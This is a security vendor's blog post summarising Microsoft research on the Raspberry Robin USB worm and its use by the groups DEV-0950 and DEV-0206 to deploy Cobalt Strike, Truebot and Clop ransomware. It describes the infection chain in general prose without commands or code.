Check the status of CVEs. Learn More.
Keeping your systems up 100% of the time requires live patching. Our solutions will align strongly with your risk, compliance, and operational uptime requirements.
TuxCare is trusted by the most innovative companies across the globe.
Learn about TuxCare's modern approach to reducing cybersecurity risk with Blogs, White Papers, and more.
Continually increasing Cybersecurity, stability, and availability of Linux servers and open source software since 2009.
TuxCare provides live security patching for numerous industries. Learn how TuxCare is minimizing risk for companies around the world.
2x a month. No spam.
November 9, 2022 - TuxCare expert team
A hacker group that is identified simply as DEV-0950 is using CIop ransomware to encrypt the network of organizations that were previously infected with the Raspberry Robin worm.
Raspberry Robin is a Windows worm that spreads via a removable USB device. It uses the Windows installer to access QNAP associated domains and download a malicious DLL. The malware then uses TOR exit nodes as a backup C2 infrastructure.
The malware uses cmd.exe to read and execute a file stored on the infected external drive. It leverages msiexec.exe for external network communication to a rogue domain, which is used as C2 to download and install a DLL library file.
Although the malware was used in post compromise activity linked to DEV-0950, data collected by Microsoft Defender for Endpoint show that nearly 3,500 devices in nearly 1,000 organizations have been compromised in the last 30 days with at least one RaspberryRobin payload-related alert.
The attacks carried out by the DEV-0950 led to the use of the Cobalt Strike beacon. In other cases, the attackers delivered Truebot malware between the Raspberry Robin infection and the Cobalt Strike deployment. Investigations further show that experts observed the worm infections using IcedID Bumblebee and TrueBot payloads starting on September 19, 2022, with the last stage of the attack being the deployment of the CIop ransomware.
However, DEV-0950 is not the only threat actor to exploit the vulnerability to launch ransomware attacks on organizations. Researchers observed the spread of FakeUpdates via Raspberry Robin malware. According to Microsoft researchers, another threat actor, identified as DEV-0206, was responsible for using the worm to deploy a downloader on networks controlled by threat actors with Evil Corp TTPs.
The researchers explained that DEV-0206 is an access broker that uses malware advertising campaigns to compromise corporate networks.
“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages. Given the interconnected nature of the cybercriminal economy, it is possible that the actors behind these Raspberry Robin-related malware campaigns— usually distributed through other means like malicious ads or email- are paying the Raspberry Robin operators for malware installs,” reads the report published by Microsoft.
The sources for this piece include an article in SecurityAffairs.
Learn About Live Patching with TuxCare
According to CyberArk researchers, GPT-based models like ChatGPT can be...
Malicious hackers have started exploiting a critical vulnerability CVE-2022-44877 in...
Deep Instinct researchers reported that RATs like StrRAT and Ratty...
According to CircleCI’s CTO, Rob Zuber, CircleCI is working with...
A remote attacker could exploit multiple vulnerabilities in four Cisco...
In a notable IcedID malware attack, the assailant impacted the...